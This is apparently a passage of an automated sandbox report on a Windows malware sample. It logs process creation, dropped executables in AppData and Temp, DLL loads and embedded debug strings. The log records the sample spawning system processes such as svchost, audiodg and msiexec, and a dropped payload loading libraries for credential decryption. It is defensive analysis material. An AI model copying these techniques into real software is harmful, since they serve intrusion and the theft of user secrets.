Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe "C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe"
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe "C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe "C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe"
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe"
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Process created: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe "C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe "C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe "C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Process created: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\audiodg.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\audiodg.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\audiodg.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\audiodg.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\audiodg.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\audiodg.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\audiodg.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\audiodg.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\audiodg.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\audiodg.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\audiodg.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\audiodg.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\audiodg.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\audiodg.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\audiodg.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\audiodg.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\audiodg.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\audiodg.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\audiodg.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\audiodg.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Section loaded: msvcp140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\audiodg.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\audiodg.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\audiodg.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\audiodg.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\audiodg.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Section loaded: libffi-7.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2064520856.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2064896907.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: 7405.tmp.zx.exe, 00000011.00000003.2059971273.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2060246980.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.17.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2061121081.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.17.dr
Source: Binary string: ucrtbase.pdb source: 7405.tmp.zx.exe, 00000012.00000002.2077184704.00007FFDFFCD5000.00000002.00000001.01000000.0000000A.sdmp, ucrtbase.dll.17.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062000144.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2060653755.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2059768742.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.17.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2063366831.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2064195340.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2065057061.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: el.pdb..*_7y source: 4A64.tmp.x.exe, 00000009.00000002.2181113512.0000000006248000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: 7405.tmp.zx.exe, 00000012.00000002.2077350907.00007FFE13321000.00000002.00000001.01000000.0000000D.sdmp, _ctypes.pyd.17.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2061481679.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2063629133.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2063097579.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2059299269.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.17.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2064066874.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2060774088.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.17.dr
Source: Binary string: vcruntime140.amd64.pdbGCTL source: 7405.tmp.zx.exe, 00000011.00000003.2059081249.000001BBE518F000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000012.00000002.2077486509.00007FFE1333E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062380579.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2060399599.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2060993419.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2063927305.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, select.pyd.17.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062650438.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.17.dr
Source: Binary string: ucrtbase.pdbUGP source: 7405.tmp.zx.exe, 00000012.00000002.2077184704.00007FFDFFCD5000.00000002.00000001.01000000.0000000A.sdmp, ucrtbase.dll.17.dr
Source: Binary string: vcruntime140.amd64.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2059081249.000001BBE518F000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000012.00000002.2077486509.00007FFE1333E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2065357794.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2061370875.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.17.dr
Source: Binary string: el.pdb source: 4A64.tmp.x.exe, 00000009.00000002.2181113512.0000000006248000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2063235629.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.17.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062246272.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2060529722.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.17.dr
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1d 10 Sep 2019built on: Mon Sep 16 11:00:37 2019 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: libcrypto-1_1.dll.17.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2063763840.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.17.dr
Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: 7405.tmp.zx.exe, 00000012.00000002.2076606633.00007FFDFB05D000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2059971273.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2061860819.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2064634549.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062506692.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2062119686.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: 7405.tmp.zx.exe, 00000011.00000003.2065508474.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.17.dr
